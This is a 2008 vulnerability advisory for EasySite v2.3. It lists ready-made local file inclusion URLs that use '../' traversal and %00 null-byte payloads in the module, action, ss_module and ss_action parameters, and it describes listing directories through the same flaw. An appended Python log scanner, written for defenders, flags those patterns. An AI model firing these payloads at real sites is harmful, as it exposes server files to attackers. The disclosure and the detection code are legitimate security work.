####################################################################
[+] EasySite v2.3 Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN
####################################################################

[+] Local File Inclusion

http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00

And many others...

This will open autoexec.bat

[+] Arbitrary View Folder Contents

You can view folder contents, and the contents of files, via LFI.

http://localhost/www/index.php?module=../../../

http://localhost/inc/vmenu.php?module=../../../

This will open the C:/ directory and show all the files in C:/.

Example :

* BOOTSECT.BAK
* BcBtRmv.log
* IO.SYS
* MSDOS.SYS
* autoexec.bat
* bootmgr
* config.sys
* grldr
* hiberfil.sys
* pagefile.sys

####################################################################

# milw0rm.com [2008-08-21]
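
Added example (not part of the original advisory): a Python check a defender could run over web-server access logs to flag the request patterns listed above, that is, traversal sequences and %00 in the module, action, ss_module and ss_action parameters. The log lines are constructed samples; the allow-list pattern for legitimate values and the handling of double-encoded and backslash forms are assumptions that go beyond what the advisory shows.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the advisory shows being passed to the include logic.
INCLUDE_PARAMS = {"module", "action", "ss_module", "ss_action"}
# Assumption: legitimate values are plain names such as "Accueil".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]+")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed access-log lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Aug/2008:10:00:01 +0000] "GET /www/index.php?module=Accueil&action=view HTTP/1.1" 200 5120',
    '192.0.2.77 - - [21/Aug/2008:10:02:13 +0000] "GET /www/index.php?module=Accueil&action=../../../../autoexec.bat%00 HTTP/1.1" 200 412',
    '192.0.2.77 - - [21/Aug/2008:10:02:40 +0000] "GET /inc/vmenu.php?module=../../../ HTTP/1.1" 200 903',
    '192.0.2.77 - - [21/Aug/2008:10:03:05 +0000] "GET /modules/Themes/index.php?ss_module=%252e%252e%255cinc HTTP/1.1" 200 377',
]

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def inspect_request(target):
    """Return (param, reason) findings for one request target."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in INCLUDE_PARAMS:
            continue
        value = decode_fully(value)  # parse_qsl has already decoded once
        reasons = []
        if ".." in re.split(r"[\\/]", value):  # ".." as a whole path segment
            reasons.append("path traversal")
        if "\x00" in value:  # decoded %00, used to cut off an appended suffix
            reasons.append("null byte")
        if not reasons and not SAFE_VALUE.fullmatch(value):
            reasons.append("unexpected characters")
        findings.extend((name, reason) for reason in reasons)
    return findings

def scan_log(lines):
    """Return (line number, param, reason) for every suspicious request."""
    return [(lineno, param, reason)
            for lineno, line in enumerate(lines, 1)
            for target in REQUEST.findall(line)
            for param, reason in inspect_request(target)]

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```

The same allow-list test (SAFE_VALUE) is what the application itself should apply to these parameters before building an include path.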